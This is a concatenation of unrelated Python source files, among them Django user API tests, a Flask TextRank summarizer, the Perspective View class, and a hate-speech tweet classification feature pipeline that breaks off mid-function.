self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
user_exists = get_user_model().objects.filter(
email=payload['email']
).exists()
self.assertFalse(user_exists)
def test_create_token_for_user(self):
"""Test that a token is created for the user"""
payload = {'email': '[email protected]', 'password': 'testpass'}
create_user(**payload)
res = self.client.post(TOKEN_URL, payload)
self.assertIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_200_OK)
def test_create_token_invalid_credentials(self):
"""Test that token is not created if invalid credentials are given"""
create_user(email='[email protected]', password='testpass')
payload = {'email': '[email protected]', 'password': 'wrong'}
res = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_no_user(self):
"""Test that token is not created if user doesn't exist"""
payload = {'email': '[email protected]', 'password': 'teststest'}
res = self.client.post(TOKEN_URL, payload)
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_create_token_missing_field(self):
"""Test that password is required"""
res = self.client.post(TOKEN_URL, {'email': 'one', 'password': ''})
self.assertNotIn('token', res.data)
self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)
def test_retrieve_user_unauthorized(self):
"""Test that authentication is required for users"""
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivateUserApiTests(TestCase):
"""Test API requests that require authentication"""
def setUp(self):
self.user = create_user(
email='[email protected]',
password='testpass',
name='name'
)
self.client = APIClient()
self.client.force_authenticate(user=self.user)
def test_retrieve_profile_success(self):
"""Test retrieving profile for logged in user"""
res = self.client.get(ME_URL)
self.assertEqual(res.status_code, status.HTTP_200_OK)
self.assertEqual(res.data, {
'name': self.user.name,
'email': self.user.email
})
def test_post_me_not_allowed(self):
"""Test that POST is not allowed on the me url"""
res = self.client.post(ME_URL, {})
self.assertEqual(res.status_code, status.HTTP_405_METHOD_NOT_ALLOWED)
def test_update_user_profile(self):
"""Test updating the user profile for authenticated user"""
payload = {'name': 'new name', 'password': 'newpass'}
res = self.client.patch(ME_URL, payload)
self.user.refresh_from_db()
self.assertEqual(self.user.name, payload['name'])
self.assertTrue(self.user.check_password(payload['password']))
self.assertEqual(res.status_code, status.HTTP_200_OK)
|
py
|
1a5ee7b1363e0f5296434bbb193566b0a7214ab1
|
if __name__ == '__main__' and __package__ is None:
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.dirname(path.abspath(__file__)))))
import os
import argparse
from mnist_model import MnistModel
from common.TFLearn.optimizer import Optimizer
from utct.TFLearn.converter import Converter
def parse_args():
parser = argparse.ArgumentParser(
description='Export TFLearn model parameters to h5 file',
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'--checkpoint-dir',
dest='checkpoint_dir',
help='Path to checkpoint files',
required=True,
type=str)
parser.add_argument(
'--file',
dest='file_name',
help='File name of checkpoint file',
required=True,
type=str)
parser.add_argument(
'--output',
dest='dst_filepath',
help='Output file for TFLearn model parameters',
required=True,
type=str)
args = parser.parse_args()
return args
def main():
args = parse_args()
model = MnistModel()
optimizer = Optimizer()
Converter.export_to_h5(
model=model,
optimizer=optimizer,
checkpoint_path=os.path.join(args.checkpoint_dir, args.file_name),
dst_filepath=args.dst_filepath)
if __name__ == '__main__':
main()
|
py
|
1a5ee809f4809f3567b0e5de2b3731c854541c5e
|
from flask import Flask, request, render_template
import json
import numpy as np
import pandas as pd
import nltk
import networkx
from nltk.tokenize import sent_tokenize
from sklearn.metrics.pairwise import cosine_similarity
from nltk.corpus import stopwords
import jinja2
jinja_environment = jinja2.Environment(autoescape=True,loader=jinja2.FileSystemLoader('templates'))
nltk.download('punkt') # one time execution
nltk.download('stopwords')
app = Flask(__name__)
@app.route('/')
def static_page():
return render_template('index.html')
def script():
    # single-domain, multiple-document article summarization
df = pd.read_csv(r'C:\Users\samanvayvajpayee\Downloads\tennis_articles_v4.csv', encoding='utf-8')
sentences = []
for s in df['article_text']:
sentences.append(sent_tokenize(s))
sentences = [y for x in sentences for y in x]
# Extract word vectors
# GloVe- word embeddings are vector representation of words.
# using GloVe also for maintaining the order
word_embeddings = {}
    # Download glove.6B.100d.txt embeddings and update the file path below accordingly
    f = open(r'Desktop\textrank\glove.6B.100d.txt', encoding='utf-8')
for line in f:
values = line.split()
word = values[0]
coefs = np.asarray(values[1:], dtype="float32")
word_embeddings[word] = coefs
f.close()
# remove punctuations, numbers and special characters
clean_sentences = pd.Series(sentences).str.replace("[^a-zA-Z]", " ")
# make alphabets lowercase
clean_sentences = [s.lower() for s in clean_sentences]
# function to remove stopwords
    def remove_stop_words(sen, lang='english'):
stop_words = stopwords.words(lang)
sentence_new = " ".join([i for i in sen if i not in stop_words])
return sentence_new
# remove stopwords
clean_sentences = [remove_stop_words(r.split()) for r in clean_sentences]
# create a word-vector each with size 100 of each sentence
sentence_vectors = []
for sen in clean_sentences:
if len(sen) != 0:
v = sum([word_embeddings.get(w, np.zeros((100,))) for w in sen.split()])/(len(sen.split())+0.001)
else:
v = np.zeros((100,))
sentence_vectors.append(v)
# similarity matrix
sim_mat = np.zeros([len(sentences), len(sentences)])
# cosine similarity to check similarity between sentences
for i in range(len(sentences)):
for j in range(len(sentences)):
if i != j:
sim_mat[i][j] = cosine_similarity(sentence_vectors[i].reshape(1, 100),
sentence_vectors[j].reshape(1, 100))[0, 0]
# making a graph by applying pageRank algo
nx_graph = networkx.from_numpy_array(sim_mat)
scores = networkx.pagerank(nx_graph)
ranked_scores = sorted(((scores[i], s) for i,s in enumerate(sentences)), reverse=True)
    # Extract the top 3 ranked sentences as the summary
    s = ""
    for i in range(3):
        s += ranked_scores[i][1] + " "
return s
summ=""
@app.route("/script", methods=['GET','POST'])
def summarize():
#if request.method == 'GET':
# input_string = request.form['text']
#if request.method == 'POST':
# request.form['sum']
summ = script()
return render_template('index.html', summary=summ)
if __name__ == "__main__":
app.run()
|
py
|
1a5ee88860c830db179ec14d63f5c19bbc9b6b21
|
"""Tests for the plots.py submodule."""
import asyncio
from datetime import datetime
from pathlib import Path
from lsw_slackbot import plots
async def test_plot_resource_use(aggregation_level=None, dpi=100):
"""Tests plots.plot_resource_use"""
await plots.plot_resource_use(Path("test_data"),
Path(f"test_plots/stack_{aggregation_level}.png"),
datetime(2020, 1, 1, 12, 53),
end_time=datetime(2020, 1, 2, 7, 4),
aggregation_level=aggregation_level, dpi=dpi)
async def test_plot_resource_use_all_aggregation_levels(
levels_to_try=(None, "minute", "hour", "day", "week", "month", "year"), dpi=100):
"""Runs test_plot_resource_use at every available aggregation level."""
for a_level in levels_to_try:
print(f"Plotting level {a_level}")
await test_plot_resource_use(a_level, dpi=dpi)
if __name__ == "__main__":
asyncio.run(test_plot_resource_use_all_aggregation_levels(dpi=300))
|
py
|
1a5ee88a70643b4a6bb1a78d0d2d04aa8d0d714e
|
class MinStack(object):
    """Stack supporting push, pop, top, and constant-time getMin by keeping an
    auxiliary stack of the running minima."""
    def __init__(self):
        self.st = []      # main stack holding all values
        self.min_st = []  # parallel stack of current minima
    def push(self, x):
        self.st.append(x)
        # record x as the new minimum when it is <= the current minimum
        if len(self.min_st) == 0 or x <= self.min_st[-1]:
            self.min_st.append(x)
    def pop(self):
        # if the popped value equals the current minimum, drop it from min_st too
        if self.st[-1] <= self.min_st[-1]:
            self.min_st.pop()
        return self.st.pop()
def top(self):
return self.st[-1]
def getMin(self):
return self.min_st[-1]
# Your MinStack object will be instantiated and called as such:
# obj = MinStack()
# obj.push(x)
# obj.pop()
# param_3 = obj.top()
# param_4 = obj.getMin()
|
py
|
1a5ee8a2001f5d878293f9798d5707379993994e
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import numpy as np
from hedp.math.derivative import gradient
from numpy.testing import assert_allclose
from hedp.math.integrals import Int_super_gaussian_ring, Int_super_gaussian
def test_gradient():
y = np.random.rand(100)
assert_allclose(np.gradient(y), gradient(y))
def test_Int_super_gaussian_ring():
a = 2.0
r_c = 10.0
gamma = 4.0
res = Int_super_gaussian_ring(a, r_c, gamma)
assert_allclose(res, np.pi*((r_c+a)**2 - (r_c-a)**2), rtol=1e-1)
def test_Int_super_gaussian():
a = 2.0
gamma = 4.0
res = Int_super_gaussian(a, gamma)
assert_allclose(res, np.pi*(a)**2, rtol=2e-1)
|
py
|
1a5ee8f5e69381aec0b389007d97e826e5c7da22
|
from abc import abstractmethod, ABC
from typing import (
Generic,
TypeVar,
)
from p2p.protocol import Payload
from .types import (
TResponsePayload,
TResult,
)
class BaseNormalizer(ABC, Generic[TResponsePayload, TResult]):
is_normalization_slow = False
"""
This variable indicates how slow normalization is. If normalization requires
any non-trivial computation, consider it slow. Then, the Manager will run it in
a different process.
"""
@staticmethod
@abstractmethod
def normalize_result(message: TResponsePayload) -> TResult:
"""
Convert underlying peer message to final result
"""
...
TPassthrough = TypeVar('TPassthrough', bound=Payload)
class NoopNormalizer(BaseNormalizer[TPassthrough, TPassthrough]):
@staticmethod
def normalize_result(message: TPassthrough) -> TPassthrough:
return message
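# Illustrative sketch (not part of the original module): a concrete normalizer
# that flags itself as slow so the Manager runs normalization out of process.
# ``ExamplePayload`` is a hypothetical Payload subclass used only for the sketch.
#
#   class ExampleLengthNormalizer(BaseNormalizer[ExamplePayload, int]):
#       is_normalization_slow = True
#
#       @staticmethod
#       def normalize_result(message: ExamplePayload) -> int:
#           return len(message.items)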
|
py
|
1a5eea88c34e818ca322bd9dadb63e057907a85b
|
################################################################################
#
# Copyright (c) 2019, the Perspective Authors.
#
# This file is part of the Perspective library, distributed under the terms of
# the Apache License 2.0. The full license can be found in the LICENSE file.
#
import os
import pandas
from functools import partial, wraps
from random import random
from .view_config import ViewConfig
from ._data_formatter import to_format, _parse_format_options
from ._constants import COLUMN_SEPARATOR_STRING
from ._utils import _str_to_pythontype
from ._callback_cache import _PerspectiveCallBackCache
from ._date_validator import _PerspectiveDateValidator
from .libbinding import (
make_view_unit,
make_view_zero,
make_view_one,
make_view_two,
to_arrow_unit,
to_arrow_zero,
to_arrow_one,
to_arrow_two,
get_row_delta_unit,
get_row_delta_zero,
get_row_delta_one,
get_row_delta_two,
)
class View(object):
"""A :class:`~perspective.View` object represents a specific transform
(pivot, filter, sort, etc) configuration on an underlying
:class:`~perspective.Table`. :class:`~perspective.View` objects
cannot be directly instantiated - they must be derived from an existing
:class:`~perspective.Table` via the :func:`~perspective.Table.view()`
method.
:class:`~perspective.View` instances receive all updates from the
:class:`~perspective.Table` from which they are derived, and can be
serialized (via ``to_*`` methods) or trigger a callback when it is updated.
:class:`~perspective.View` objects will remain in memory and actively
    process updates until the :obj:`~perspective.View.delete()` method is called.
"""
def __init__(self, Table, **kwargs):
self._name = "py_" + str(random())
self._table = Table
self._config = ViewConfig(**kwargs)
self._sides = self.sides()
date_validator = _PerspectiveDateValidator()
self._is_unit_context = (
self._table._index == ""
and self._sides == 0
and len(self._config.get_row_pivots()) == 0
and len(self._config.get_column_pivots()) == 0
and len(self._config.get_filter()) == 0
and len(self._config.get_sort()) == 0
and len(self._config.get_computed_columns()) == 0
)
if self._is_unit_context:
self._view = make_view_unit(
self._table._table,
self._name,
COLUMN_SEPARATOR_STRING,
self._config,
date_validator,
)
elif self._sides == 0:
self._view = make_view_zero(
self._table._table,
self._name,
COLUMN_SEPARATOR_STRING,
self._config,
date_validator,
)
elif self._sides == 1:
self._view = make_view_one(
self._table._table,
self._name,
COLUMN_SEPARATOR_STRING,
self._config,
date_validator,
)
else:
self._view = make_view_two(
self._table._table,
self._name,
COLUMN_SEPARATOR_STRING,
self._config,
date_validator,
)
self._column_only = self._view.is_column_only()
self._update_callbacks = self._table._update_callbacks
self._delete_callbacks = _PerspectiveCallBackCache()
self._client_id = None
def get_config(self):
"""Returns a copy of the immutable configuration ``kwargs`` from which
this :class:`~perspective.View` was instantiated.
Returns:
:obj:`dict`: ``kwargs`` supplied to the
:func:`perspective.Table.view()` method.
"""
return self._config.get_config()
def sides(self):
"""An integer representing the # of hierarchial axis on this
:class:`~perspective.View`.
0 - Neither ``row_pivots`` nor ``column_pivots`` properties are set.
1 - ``row_pivots`` is set.
2 - ``column_pivots`` is set (and also maybe ``row_pivots``).
Returns:
:obj:`int`: 0 <= N <= 2
"""
if (
len(self._config.get_row_pivots()) > 0
or len(self._config.get_column_pivots()) > 0
):
if len(self._config.get_column_pivots()) > 0:
return 2
else:
return 1
else:
return 0
def num_rows(self):
"""The number of aggregated rows in the :class:`~perspective.View`.
This count includes the total aggregate rows for all ``row_pivots``
depth levels, and can also be affected by any applied ``filter``.
Returns:
:obj:`int`: Number of rows.
"""
return self._view.num_rows()
def num_columns(self):
"""The number of aggregated columns in the :class:`~perspective.View`.
This is affected by the ``column_pivots`` that are applied to the
:class:`~perspective.View`.
Returns:
:obj:`int`: Number of columns.
"""
return self._view.num_columns()
def get_row_expanded(self, idx):
"""Returns whether row at `idx` is expanded or collapsed.
Returns:
:obj:`bool`: Is this row expanded?
"""
return self._view.get_row_expanded(idx)
def expand(self, idx):
"""Expands the row at 'idx', i.e. displaying its leaf rows.
Args:
idx (:obj:`int`): Row index to expand.
"""
return self._view.expand(idx, len(self._config.get_row_pivots()))
def collapse(self, idx):
"""Collapses the row at 'idx', i.e. hiding its leaf rows.
Args:
idx (:obj:`int`): Row index to collapse.
"""
return self._view.collapse(idx)
def set_depth(self, depth):
"""Sets the expansion depth of the pivot tree.
Args:
depth (:obj:`int`): Depth to collapse all nodes to, which
                may be no greater than the length of the ``row_pivots``
property.
"""
return self._view.set_depth(depth, len(self._config.get_row_pivots()))
def column_paths(self):
"""Returns the names of the columns as they show in the
        :class:`~perspective.View`, i.e. the hierarchical columns when
``column_pivots`` is applied.
Returns:
            :obj:`list` of :obj:`str`: Aggregated column names.
"""
paths = self._view.column_paths()
string_paths = []
for path in paths:
string_paths.append(
COLUMN_SEPARATOR_STRING.join([p.to_string(False) for p in path])
)
return string_paths
def schema(self, as_string=False):
"""The schema of this :class:`~perspective.View`, which is a key-value
map that contains the column names and their Python data types.
        If the columns are aggregated, their aggregated types will be
        returned instead.
Keyword Args:
as_string (:obj:`bool`): returns data types as string
representations, if ``True``.
Returns:
:obj:`dict`: A map of :obj:`str` column name to :obj:`str` or
:obj:`type`, depending on the value of ``as_string`` kwarg.
"""
if as_string:
return {item[0]: item[1] for item in self._view.schema().items()}
return {
item[0]: _str_to_pythontype(item[1]) for item in self._view.schema().items()
}
def computed_schema(self, as_string=False):
if as_string:
return {item[0]: item[1] for item in self._view.computed_schema().items()}
return {
item[0]: _str_to_pythontype(item[1])
for item in self._view.computed_schema().items()
}
def on_update(self, callback, mode=None):
"""Add a callback to be fired when :func:`perspective.Table.update()` is
called on the parent :class:`~perspective.Table`.
Multiple callbacks can be set through calling ``on_update`` multiple
times, and will be called in the order they are set. Callback must be a
callable function that takes exactly 1 or 2 parameters, depending on
whether `on_update` is called with `mode="row"`. The first parameter is
always `port_id`, an :obj:`int` that indicates which input port the
update comes from. A `RuntimeError` will be thrown if the callback
has mis-configured parameters.
Args:
callback (:obj:`callable`): a callable function reference that will
be called when :func:`perspective.Table.update()` is called.
mode (:obj:`str`): if set to "row", the callback will be passed
an Arrow-serialized dataset of the rows that were updated.
Defaults to "none".
Examples:
>>> def updater(port_id):
... print("Update fired on port", port_id)
>>> def updater_with_delta(port_id, delta):
... print("Update on port", port_id, "delta len:", len(delta)))
>>> view.on_update(updater)
>>> view.on_update(updater, mode="row")
            >>> table.update({"a": [1]})
>>> Update fired on port 0
>>> Update on port 0 delta len: 64
"""
self._table._state_manager.call_process(self._table._table.get_id())
mode = mode or "none"
if not callable(callback):
raise ValueError("Invalid callback - must be a callable function")
if mode not in ["none", "row"]:
raise ValueError(
'Invalid update mode {} - valid on_update modes are "none" or "row"'.format(
mode
)
)
if mode == "row":
if not self._view._get_deltas_enabled():
self._view._set_deltas_enabled(True)
wrapped_callback = partial(
self._wrapped_on_update_callback, mode=mode, callback=callback
)
self._update_callbacks.add_callback(
{
"name": self._name,
"orig_callback": callback,
"callback": wrapped_callback,
}
)
def remove_update(self, callback):
"""Given a callback function, remove it from the list of callbacks.
Args:
callback (:obj:`func`): a function reference that will be removed.
Examples:
>>> table = perspective.Table(data)
>>> view = table.view()
>>> view2 = table.view()
>>> def callback():
... print("called!")
>>> view.on_update(callback)
>>> view2.on_update(callback)
>>> table.update(new_data)
called!
>>> view2.remove_update(callback)
>>> table.update(new_data) # callback removed and will not fire
"""
self._table._state_manager.call_process(self._table._table.get_id())
if not callable(callback):
return ValueError("remove_update callback should be a callable function!")
self._update_callbacks.remove_callbacks(
lambda cb: cb["orig_callback"] == callback
)
def on_delete(self, callback):
"""Set a callback to be run when the :func:`perspective.View.delete()`
method is called on this :class:`~perspective.View`.
Args:
callback (:obj:`callable`): A callback to run after
:func:`perspective.View.delete()` method has been called.
Examples:
>>> def deleter():
>>> print("Delete called!")
>>> view.on_delete(deleter)
>>> view.delete()
>>> Delete called!
"""
if not callable(callback):
return ValueError("on_delete callback must be a callable function!")
self._delete_callbacks.add_callback(callback)
def delete(self):
"""Delete the :class:`~perspective.View` and clean up all associated
callbacks.
This method must be called to clean up callbacks used by the
:class:`~perspective.View`, as well as allow for deletion of the
underlying :class:`~perspective.Table`.
Examples:
>>> table = perspective.Table(data)
>>> view = table.view()
>>> view.delete()
"""
self._table._state_manager.remove_process(self._table._table.get_id())
self._table._views.pop(self._table._views.index(self._name))
# remove the callbacks associated with this view
self._update_callbacks.remove_callbacks(lambda cb: cb["name"] == self._name)
[cb() for cb in self._delete_callbacks]
def remove_delete(self, callback):
"""Remove the delete callback associated with this
:class:`~perspective.View`.
Args:
callback (:obj:`callable`): A reference to a callable function that
will be removed from delete callbacks.
Examples:
>>> table = perspective.Table(data)
>>> view = table.view()
>>> view2 = table.view()
>>> def callback():
... print("called!")
>>> view.on_delete(callback)
>>> view2.on_delete(callback)
>>> view.delete()
called!
>>> view2.remove_delete(callback)
>>> view2.delete() # callback removed and will not fire
"""
if not callable(callback):
return ValueError("remove_delete callback should be a callable function!")
self._delete_callbacks.remove_callbacks(lambda cb: cb == callback)
    def to_arrow(self, **kwargs):
        """Serialize the :class:`~perspective.View`'s dataset into the Apache
        Arrow binary format, windowed via the ``start_row``, ``end_row``,
        ``start_col``, and ``end_col`` keyword arguments."""
options = _parse_format_options(self, kwargs)
if self._is_unit_context:
return to_arrow_unit(
self._view,
options["start_row"],
options["end_row"],
options["start_col"],
options["end_col"],
)
elif self._sides == 0:
return to_arrow_zero(
self._view,
options["start_row"],
options["end_row"],
options["start_col"],
options["end_col"],
)
elif self._sides == 1:
return to_arrow_one(
self._view,
options["start_row"],
options["end_row"],
options["start_col"],
options["end_col"],
)
else:
return to_arrow_two(
self._view,
options["start_row"],
options["end_row"],
options["start_col"],
options["end_col"],
)
def to_records(self, **kwargs):
"""Serialize the :class:`~perspective.View`'s dataset into a :obj:`list`
of :obj:`dict` containing each row.
By default, the entire dataset is returned, though this can be windowed
via ``kwargs``. When ``row_pivots`` are applied, a ``__ROW_PATH__``
column name will be generated in addition to the applied ``columns``.
When ``column_pivots`` are applied, column names will be qualified
with their column group name.
Keyword Args:
start_row (:obj:`int`): (Defaults to 0).
end_row (:obj:`int`): (Defaults to
:func:`perspective.View.num_rows()`).
start_col (:obj:`int`): (Defaults to 0).
end_col (:obj:`int`): (Defaults to
:func:`perspective.View.num_columns()`).
id (:obj:`bool`): Whether to return a logical row ID for each
row (Defaults to ``False``).
index (:obj:`bool`): Whether to return an implicit pkey for each
row (Defaults to ``False``).
leaves_only (:obj:`bool`): Whether to return only the data at the
end of the tree (Defaults to ``False``).
Returns:
:obj:`list` of :obj:`dict`: A list of :obj:`dict`, where each dict
represents a row of the current state of the
:class:`~perspective.View`.
"""
return to_format(kwargs, self, "records")
def to_dict(self, **options):
"""Serialize the :class:`~perspective.View`'s dataset into a :obj:`dict`
of :obj:`str` keys and :obj:`list` values. Each key is a column name,
and the associated value is the column's data packed into a :obj:`list`.
If the :class:`~perspective.View` is aggregated, the aggregated dataset
will be returned.
Keyword Args:
start_row (:obj:`int`): (Defaults to 0).
end_row (:obj:`int`): (Defaults to
:func:`perspective.View.num_rows()`).
start_col (:obj:`int`): (Defaults to 0).
end_col (:obj:`int`): (Defaults to
:func:`perspective.View.num_columns()`).
id (:obj:`bool`): Whether to return a logical row ID for each
row (Defaults to ``False``).
index (:obj:`bool`): Whether to return an implicit pkey for each
row (Defaults to ``False``).
leaves_only (:obj:`bool`): Whether to return only the data at the
end of the tree (Defaults to ``False``).
Returns:
:obj:`dict`: A dictionary with string keys and list values, where
key = column name and value = column values.
"""
return to_format(options, self, "dict")
def to_numpy(self, **options):
"""Serialize the view's dataset into a :obj:`dict` of :obj:`str` keys
and :class:`numpy.array` values. Each key is a column name, and the
associated value is the column's data packed into a numpy array.
Keyword Args:
start_row (:obj:`int`): (Defaults to 0).
end_row (:obj:`int`): (Defaults to
:func:`perspective.View.num_rows()`).
start_col (:obj:`int`): (Defaults to 0).
end_col (:obj:`int`): (Defaults to
:func:`perspective.View.num_columns()`).
id (:obj:`bool`): Whether to return a logical row ID for each
row (Defaults to ``False``).
index (:obj:`bool`): Whether to return an implicit pkey for each
row (Defaults to ``False``).
leaves_only (:obj:`bool`): Whether to return only the data at the
end of the tree (Defaults to ``False``).
Returns:
:obj:`dict` of :class:`numpy.array`: A dictionary with string keys
and numpy array values, where key = column name and
value = column values.
"""
return to_format(options, self, "numpy")
def to_df(self, **options):
"""Serialize the view's dataset into a pandas dataframe.
If the view is aggregated, the aggregated dataset will be returned.
Keyword Args:
start_row (:obj:`int`): (Defaults to 0).
end_row (:obj:`int`): (Defaults to
:func:`perspective.View.num_rows()`).
start_col (:obj:`int`): (Defaults to 0).
end_col (:obj:`int`): (Defaults to
:func:`perspective.View.num_columns()`).
id (:obj:`bool`): Whether to return a logical row ID for each
row (Defaults to ``False``).
index (:obj:`bool`): Whether to return an implicit pkey for each
row (Defaults to ``False``).
leaves_only (:obj:`bool`): Whether to return only the data at the
end of the tree (Defaults to ``False``).
Returns:
:class:`pandas.DataFrame`: A DataFrame serialization of the current
state of this :class:`~perspective.View`.
"""
cols = self.to_numpy(**options)
return pandas.DataFrame(cols)
def to_csv(self, **options):
"""Serialize the :class:`~perspective.View`'s dataset into a CSV string.
Keyword Args:
start_row (:obj:`int`): (Defaults to 0).
end_row (:obj:`int`): (Defaults to
:func:`perspective.View.num_rows()`).
start_col (:obj:`int`): (Defaults to 0).
end_col (:obj:`int`): (Defaults to
:func:`perspective.View.num_columns()`).
id (:obj:`bool`): Whether to return a logical row ID for each
row (Defaults to ``False``).
index (:obj:`bool`): Whether to return an implicit pkey for each
row (Defaults to False).
leaves_only (:obj:`bool`): Whether to return only the data at the
end of the tree (Defaults to False).
date_format (:obj:`str`): How ``datetime`` objects should be
formatted in the CSV.
Returns:
:obj:`str`: A CSV-formatted string containing the serialized data.
"""
date_format = None
# Handle to_csv calls from `<perspective-viewer>`, which uses the
# JavaScript Intl.DateTimeFormat API that takes a locale instead of a
# string format.
# TODO This should move to portable code.
if options.pop("formatted", False):
date_format = "%Y/%m/%d %H:%M:%S"
return self.to_df(**options).to_csv(
date_format=date_format,
line_terminator="\r\n" if os.name == "nt" else "\n",
)
@wraps(to_records)
def to_json(self, **options):
return self.to_records(**options)
@wraps(to_dict)
def to_columns(self, **options):
return self.to_dict(**options)
def _get_row_delta(self):
if self._is_unit_context:
return get_row_delta_unit(self._view)
elif self._sides == 0:
return get_row_delta_zero(self._view)
elif self._sides == 1:
return get_row_delta_one(self._view)
else:
return get_row_delta_two(self._view)
def _num_hidden_cols(self):
"""Returns the number of columns that are sorted but not shown."""
hidden = 0
columns = self._config.get_columns()
for sort in self._config.get_sort():
if sort[0] not in columns:
hidden += 1
return hidden
def _wrapped_on_update_callback(self, **kwargs):
"""Provide the user-defined callback function with additional metadata
from the view.
"""
mode = kwargs["mode"]
port_id = kwargs["port_id"]
cache = kwargs["cache"]
callback = kwargs["callback"]
if cache.get(port_id) is None:
cache[port_id] = {}
if mode == "row":
if cache[port_id].get("row_delta") is None:
cache["row_delta"] = self._get_row_delta()
callback(port_id, cache["row_delta"])
else:
callback(port_id)
|
py
|
1a5eeaca70d3e7fa4890162cd2a9226ae4c16c94
|
import uvicorn
if __name__ == "__main__":
uvicorn.run("api:app", host="0.0.0.0", port=80, reload=True)
|
pyw
|
1a5eec00a6d61d2b62a72e7f32c02cd94f434b5a
|
import os
import subprocess
MAIN_LOCATION = os.path.dirname(os.path.abspath(__file__)) + '/src/__main__.py'
# MAIN_LOCATION = os.path.dirname(os.path.abspath(__file__)) + '/__main__.py'
subprocess.run(
['pyw', MAIN_LOCATION],
creationflags=subprocess.CREATE_NO_WINDOW,
check=False
)
|
py
|
1a5eec364ffc7c17c0aeeba54f53bf34b39ef9d1
|
import pandas as pd
import numpy as np
import pickle
import sys
from sklearn.feature_extraction.text import TfidfVectorizer
import nltk
from nltk.stem.porter import *
import string
import re
from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer as VS
from textstat.textstat import *
from sklearn.linear_model import LogisticRegression
from sklearn.feature_selection import SelectFromModel
from sklearn.metrics import classification_report
from sklearn.svm import LinearSVC
import matplotlib.pyplot as plt
import seaborn
from sklearn.model_selection import train_test_split
from sklearn.model_selection import StratifiedKFold, GridSearchCV
from sklearn.pipeline import Pipeline
import warnings
warnings.simplefilter(action='ignore', category=FutureWarning)
# df = pd.read_csv("../data/labeled_data.csv")
df = pd.read_csv("../data/MMHS10K_data.csv")
df_test = pd.read_csv("../data/MMHS10K_test_data.csv")
out_file = open('../../../datasets/HateSPic/HateSPic/davison/MMHS10K_v2mm_testScores.txt','w')
df.describe()
df.columns
df['class'].hist()
tweets=df.tweet
tweets_test=df_test.tweet
# Feature generation
stopwords = nltk.corpus.stopwords.words("english")
other_exclusions = ["#ff", "ff", "rt"]
stopwords.extend(other_exclusions)
stemmer = PorterStemmer()
def preprocess(text_string):
"""
Accepts a text string and replaces:
1) urls with URLHERE
2) lots of whitespace with one instance
3) mentions with MENTIONHERE
This allows us to get standardized counts of urls and mentions
Without caring about specific people mentioned
"""
space_pattern = '\s+'
giant_url_regex = ('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|'
'[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
mention_regex = '@[\w\-]+'
parsed_text = re.sub(space_pattern, ' ', text_string)
parsed_text = re.sub(giant_url_regex, '', parsed_text)
parsed_text = re.sub(mention_regex, '', parsed_text)
return parsed_text
def tokenize(tweet):
"""Removes punctuation & excess whitespace, sets to lowercase,
and stems tweets. Returns a list of stemmed tokens."""
tweet = " ".join(re.split("[^a-zA-Z]*", tweet.lower())).strip()
tokens = [stemmer.stem(t) for t in tweet.split()]
return tokens
def basic_tokenize(tweet):
"""Same as tokenize but without the stemming"""
tweet = " ".join(re.split("[^a-zA-Z.,!?]*", tweet.lower())).strip()
return tweet.split()
vectorizer = TfidfVectorizer(
tokenizer=tokenize,
preprocessor=preprocess,
ngram_range=(1, 3),
stop_words=stopwords,
use_idf=True,
smooth_idf=False,
norm=None,
decode_error='replace',
max_features=10000,
min_df=5,
max_df=0.75
)
#Construct tfidf matrix and get relevant scores
tfidf = vectorizer.fit_transform(tweets).toarray()
tfidf_test = vectorizer.transform(tweets_test).toarray()
vocab = {v:i for i, v in enumerate(vectorizer.get_feature_names())}
idf_vals = vectorizer.idf_
idf_dict = {i:idf_vals[i] for i in vocab.values()} #keys are indices; values are IDF scores
#Get POS tags for tweets and save as a string
tweet_tags = []
for t in tweets:
tokens = basic_tokenize(preprocess(t))
tags = nltk.pos_tag(tokens)
tag_list = [x[1] for x in tags]
tag_str = " ".join(tag_list)
tweet_tags.append(tag_str)
#Get POS tags for tweets and save as a string
tweet_tags_test = []
for t in tweets_test:
tokens = basic_tokenize(preprocess(t))
tags = nltk.pos_tag(tokens)
tag_list = [x[1] for x in tags]
tag_str = " ".join(tag_list)
tweet_tags_test.append(tag_str)
#We can use the TFIDF vectorizer to get a token matrix for the POS tags
pos_vectorizer = TfidfVectorizer(
tokenizer=None,
lowercase=False,
preprocessor=None,
ngram_range=(1, 3),
stop_words=None,
use_idf=False,
smooth_idf=False,
norm=None,
decode_error='replace',
max_features=5000,
min_df=5,
max_df=0.75,
)
#Construct POS TF matrix and get vocab dict
pos = pos_vectorizer.fit_transform(pd.Series(tweet_tags)).toarray()
pos_test = pos_vectorizer.transform(pd.Series(tweet_tags_test)).toarray()
pos_vocab = {v:i for i, v in enumerate(pos_vectorizer.get_feature_names())}
# Now get other features
sentiment_analyzer = VS()
def count_twitter_objs(text_string):
"""
Accepts a text string and replaces:
1) urls with URLHERE
2) lots of whitespace with one instance
3) mentions with MENTIONHERE
4) hashtags with HASHTAGHERE
This allows us to get standardized counts of urls and mentions
Without caring about specific people mentioned.
Returns counts of urls, mentions, and hashtags.
"""
space_pattern = '\s+'
giant_url_regex = ('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|'
'[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+')
mention_regex = '@[\w\-]+'
hashtag_regex = '#[\w\-]+'
parsed_text = re.sub(space_pattern, ' ', text_string)
parsed_text = re.sub(giant_url_regex, 'URLHERE', parsed_text)
parsed_text = re.sub(mention_regex, 'MENTIONHERE', parsed_text)
parsed_text = re.sub(hashtag_regex, 'HASHTAGHERE', parsed_text)
return (parsed_text.count('URLHERE'), parsed_text.count('MENTIONHERE'), parsed_text.count('HASHTAGHERE'))
def other_features(tweet):
"""This function takes a string and returns a list of features.
